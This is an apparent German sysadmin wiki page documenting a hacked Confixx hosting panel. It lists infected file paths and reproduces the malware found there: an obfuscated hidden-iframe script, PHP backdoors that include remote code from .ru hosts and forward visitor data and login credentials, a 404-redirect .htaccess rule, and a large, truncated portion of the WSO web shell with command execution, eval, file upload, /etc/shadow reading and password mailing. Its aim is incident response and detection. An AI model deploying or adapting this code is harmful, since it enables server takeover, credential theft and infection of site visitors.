Hacked Confixx

Aus HS Syswiki

(Unterschied zwischen Versionen)

Wechseln zu: Navigation, Suche

Aktuelle Version vom 17. September 2015, 17:27 Uhr

Hacked Confixx

grep for new files:

some informations: http://lukewelling.com/category/spyware/

http://forums.jaguarpc.com/hosting-talk-chit-chat/13305-any-ideas-about-hack.html

/home/www/confixx/html/webapps/zencart/index.de.html:

/home/www/confixx/html/webapps/xrms/index.de.html:

/home/www/confixx/html/webapps/xoops/index.de.html:

/home/www/confixx/html/webapps/xaraya/index.de.html:

/home/www/confixx/html/webapps/weberp/index.de.html:

/home/www/confixx/html/webapps/wbbook/index.de.html:

/home/www/confixx/html/webapps/vstat/index.de.html:

... haben aber anderen code vorhanden ...

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>

<div style="visibility: hidden; position: absolute; left: 1; top: 1">iframe src="http://user19.iframe.ru/?s=1" fraborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>

Search for "</p><a href=.*</a>" of for class=giepoaytr

you can use follow list to find some of them: http://www.maxispecialisten.se/punbb-1.2.7/sess31002/lk.txt http://www.afdex.com/common/board/data/Automatic_Multi_Stage_Cold_Forging/sess31002/lk.txt

/home/www/confixx/html/webapps/weberp/index.de.html:

<a href="http://gallery.ransomed.us/albums/album06/SMS-%2BSamsung%2BSGH-S500.shtml" class=giepoaytr title="SMS- Samsung SGH-S500" target=_blank>SMS- Samsung SGH-S500</a>

/home/www/confixx/html/webapps/wbbook/index.de.html:

<a href="http://www.woltlab.de/products/burning_book/demo/">http://www.woltlab.de/products/burning_book/demo/</a>
<a href="http://www.flyfic.renaissance-ghost.net/stories/graphospasm/images/no%2Bcd%2Bcrack%2Btonka.jsp" class=giepoaytr title="no cd crack tonka">no cd crack tonka</a>

/home/www/confixx/html/webapps/vstat/index.de.html:

<a href="http://www.geraldlee.net/nm/jak%2Bm%2Bmio%2Bpl.phtml" class=giepoaytr target=_blank>jak m mio pl</a>

/home/www/confixx/html/webapps/typo/index.de.html:

<a href="http://www.konline.org/alber/gallery/albums/album02/Underground2-Crack.jsp" class=giepoaytr>Underground2-Crack</a>

/home/www/confixx/html/webapps/tsep/index.de.html:

<a href="http://www.squarefc.com/gallery/content/Mascot/diablo%202%20downlaod.phtml" class=giepoaytr>diablo 2 downlaod</a>

/home/www/confixx/html/webapps/topdownloads/index.de.html:

<a href="http://www.artmotion.between-worlds.net/iB_html/non-cgi/Skin/SKIN-2/grifin-barbie.html" class=giepoaytr title="grifin barbie">grifin barbie</a>

/home/www/confixx/html/webapps/template/index.de.html:

<a href="http://www.rockpoppyprincess.pinkgraffiti.com/cart/images/couter.strike1.6.dowload.shtml" class=giepoaytr>couter strike1.6 dowload</a>

/home/www/confixx/html/webapps/squirrelmail/index.de.html:

<a href="http://mkweb.mattkennedy.us/modules/news/images/topics/Warcraft_MAPHACK_v_1.20.shtml" class=giepoaytr>Warcraft MAPHACK v 1.20</a>

/home/www/confixx/html/webapps/zencart/guest.php:

/home/www/confixx/html/webapps/xrms/configs.php:

/home/www/confixx/html/webapps/xoops/include.php:

/home/www/confixx/html/webapps/xaraya/date.php:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

open data from "user7.htmltags.ru"

/home/www/confixx/html/webapps/zencart/create.php:

/home/www/confixx/html/webapps/xrms/messages.php:

/home/www/confixx/html/webapps/xoops/includes.php:

/home/www/confixx/html/webapps/xaraya/report.php:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

open data from "http://bis.iframe.ru/master.php?r_addr="

/home/www/confixx/html/webapps/zencart/.htaccess:

/home/www/confixx/html/webapps/xrms/.htaccess:

/home/www/confixx/html/webapps/xoops/.htaccess:

/home/www/confixx/html/webapps/xaraya/.htaccess:

Options -MultiViews
ErrorDocument 404 //webapps/zencart/guest.php

allways force an 404 error and redirect to malware file

/home/www/confixx/html/skins/mskin_19/small_icons/properties.php

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

/home/www/confixx/html/skins/mskin_19/small_icons/layout.php

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

<?php
//-----------------Password---------------------
$â297a57a5a743894a0e4a801fc3"; //admin
$â = "#fff";
$â = true;
$â = 'UTF-8';
$â = 'FilesMan';
$â = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
        prototype(md5($_SERVER['HTTP_HOST'])."key", $â);
}
if(empty($_POST['charset']))
        $_POST['charset'] = $â;
if (!isset($_POST['ne'])) {
        if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
        if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
        if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
        if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
        if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
}
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '4.1.0');
if(get_magic_quotes_gpc()) {
        function stripslashes_array($array) {
                return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
        }
        $_POST = stripslashes_array($_POST);
    $_COOKIE = stripslashes_array($_COOKIE);
}
if(!empty($â
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $â
rototype(md5($_SERVER['HTTP_HOST']), $â
f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â
ardLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
        $os = 'win';
else
        $os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
        @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
        $home_cwd = str_replace("\\", "/", $home_cwd);
        $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
        $cwd .= '/';
function hardHeader() {
        if(empty($_POST['charset']))
                $_POST['charset'] = $GLOBALS['â'];
        global $â;
        echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title>
<style>
        body {background-color:#060a10;color:#e1e1e1;}
        body,td,th      {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
        table.info      {color:#C3C3C3;background-color:#060a10;}
        span,h1,a       {color:$â !important;}
        span            {font-weight:bolder;}
        h1                      {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
        div.content     {padding:5px;margin-left:5px;background-color:#060a10;}
        a                       {text-decoration:none;}
        a:hover         {text-decoration:underline;}
        .ml1            {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;}
        .bigarea        {width:100%;height:250px; }
        input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;}
        form            {margin:0px;}
        #toolsTbl       {text-align:center;}
        .toolsInp       {width:300px}
        .main th        {text-align:left;background-color:#060a10;}
        .main tr:hover{background-color:#354252;}
        .main td, th{vertical-align:middle;}
        .l1                     {background-color:#1e252e;}
        pre                     {font:9pt Courier New;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
 
        function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
        function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
        function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
        function set(a,c,p1,p2,p3,charset) {
                if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
                if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
                if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
                if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
                if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
                d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
                d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
                d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
                d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
                d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
                if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
        }
        function g(a,c,p1,p2,p3,charset) {
                set(a,c,p1,p2,p3,charset);
                d.mf.submit();
        }
        function a(a,c,p1,p2,p3,charset) {
                set(a,c,p1,p2,p3,charset);
                var params = 'ajax=true';
                for(i=0;i<d.mf.elements.length;i++)
                        params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
                sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
        }
        function sr(url, params) {
                if (window.XMLHttpRequest)
                        req = new XMLHttpRequest();
                else if (window.ActiveXObject)
                        req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
        }
        function processReqChange() {
                if( (req.readyState == 4) )
                        if(req.status == 200) {
                                var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
                                var arr=reg.exec(req.responseText);
                                eval(arr[2].substr(0, arr[1]));
                        } else alert('Request error!');
        }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
        $freeSpace = @diskfreespace($GLOBALS['cwd']);
        $totalSpace = @disk_total_space($GLOBALS['cwd']);
        $totalSpace = $totalSpace?$totalSpace:1;
        $release = @php_uname('r');
        $kernel = @php_uname('s');
        $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
        if(strpos('Linux', $kernel) !== false)
                $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
        else
                $explink .= urlencode($kernel . ' ' . substr($release,0,3));
        if(!function_exists('posix_getegid')) {
                $user = @get_current_user();
                $uid = @getmyuid();
                $gid = @getmygid();
                $group = "?";
        } else {
                $uid = @posix_getpwuid(@posix_geteuid());
                $gid = @posix_getgrgid(@posix_getegid());
                $user = $uid['name'];
                $uid = $uid['uid'];
                $group = $gid['name'];
                $gid = $gid['gid'];
        }
        $cwd_links = '';
        $path = explode("/", $GLOBALS['cwd']);
        $n=count($path);
        for($i=0; $i<$n-1; $i++) {
                $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
                for($j=0; $j<=$i; $j++)
                        $cwd_links .= $path[$j].'/';
                $cwd_links .= "\")'>".$path[$i]."/</a>";
        }
        $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
        $opt_charsets = '';
        foreach($charsets as $â)
                $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>';
        $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
        if(!empty($GLOBALS['â))
        $m['Logout'] = 'Logout';
        $m['Self remove'] = 'SelfRemove';
        $menu = '';
        foreach($m as $k => $v)
                $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
        $drives = "";
        if ($GLOBALS['os'] == 'win') {
                foreach(range('c','z') as $drive)
                if (is_dir($drive.':\\'))
                        $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
        }
        echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'.
                 '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'.
                 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'.
                 '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>';
}
function hardFooter() {
        $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
        <tr>
                <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
                <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
        </tr><tr>
                <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
                <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
        </tr><tr>
                <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
                <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
                <input type=hidden name=a value='FilesMan'>
                <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
                <input type=hidden name=p1 value='uploadFile'>
                <input type=hidden name=ne value=''>
                <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
                <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='>>'></form><br  ></td>
        </tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
function ex($in) {
        $â = '';
        if (function_exists('exec')) {
                @exec($in,$â);
                $â = @join("\n",$â);
        } elseif (function_exists('passthru')) {
                ob_start();
                @passthru($in);
                $â = ob_get_clean();
        } elseif (function_exists('system')) {
                ob_start();
                @system($in);
                $â = ob_get_clean();
        } elseif (function_exists('shell_exec')) {
                $â = shell_exec($in);
        } elseif (is_resource($f = @popen($in,"r"))) {
                $â = "";
                while(!@feof($f))
                        $â .= fread($f,1024);
                pclose($f);
        }else return "â³ Unable to execute command\n";
        return ($â==''?"â³ Query did not return anything\n":$â);
}
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â;
 
if(array_key_exists('pff',$_POST)){
         $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp);
}
function hardLogin() {
                if(!empty($_SERVER['HTTP_USER_AGENT'])) {
                  $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
                  if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
                  header('HTTP/1.0 404 Not Found');
                  exit;
                  }
                }
        die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>");
}
function viewSize($s) {
        if($s >= 1073741824)
                return sprintf('%1.2f', $s / 1073741824 ). ' GB';
        elseif($s >= 1048576)
                return sprintf('%1.2f', $s / 1048576 ) . ' MB';
        elseif($s >= 1024)
                return sprintf('%1.2f', $s / 1024 ) . ' KB';
        else
                return $s . ' B';
}
function perms($p) {
        if (($p & 0xC000) == 0xC000)$i = 's';
        elseif (($p & 0xA000) == 0xA000)$i = 'l';
        elseif (($p & 0x8000) == 0x8000)$i = '-';
        elseif (($p & 0x6000) == 0x6000)$i = 'b';
        elseif (($p & 0x4000) == 0x4000)$i = 'd';
        elseif (($p & 0x2000) == 0x2000)$i = 'c';
        elseif (($p & 0x1000) == 0x1000)$i = 'p';
        else $i = 'u';
        $i .= (($p & 0x0100) ? 'r' : '-');
        $i .= (($p & 0x0080) ? 'w' : '-');
        $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
        $i .= (($p & 0x0020) ? 'r' : '-');
        $i .= (($p & 0x0010) ? 'w' : '-');
        $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
        $i .= (($p & 0x0004) ? 'r' : '-');
        $i .= (($p & 0x0002) ? 'w' : '-');
        $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
        return $i;
}
function viewPermsColor($f) {
        if (!@is_readable($f))
                return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
        elseif (!@is_writable($f))
                return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
        else
                return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
}
function hardScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}
function which($p) {
        $path = ex('which ' . $p);
        if(!empty($path))
                return $path;
        return false;
}
function actionRC() {
        if(!@$_POST['p1']) {
                $a = array(
                        "uname" => php_uname(),
                        "php_version" => phpversion(),
                        "VERSION" => VERSION,
                        "safemode" => @ini_get('safe_mode')
                );
                echo serialize($a);
        } else {
                eval($_POST['p1']);
        }
}
function prototype($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
function actionSecInfo() {
        hardHeader();
        echo '<h1>Server security information</h1><div class=content>';
        function showSecParam($n, $v) {
                $v = trim($v);
                if($v) {
                        echo '<span>' . $n . ': </span>';
                        if(strpos($v, "\n") === false)
                                echo $v . '<br>';
                        else
                                echo '<pre class=ml1>' . $v . '</pre>';
                }
        }
        showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
        showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
        showSecParam('Open base dir', @ini_get('open_basedir'));
        showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
        showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
        showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
        $temp=array();
        if(function_exists('mysql_get_client_info'))
                $temp[] = "MySql (".mysql_get_client_info().")";
        if(function_exists('mssql_connect'))
                $temp[] = "MSSQL";
        if(function_exists('pg_connect'))
                $temp[] = "PostgreSQL";
        if(function_exists('oci_connect'))
                $temp[] = "Oracle";
        showSecParam('Supported databases', implode(', ', $temp));
        echo '<br>';
        if($GLOBALS['os'] == 'nix') {
            showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            showSecParam('OS version', @file_get_contents('/proc/version'));
            showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $â)
                    if(which($â))
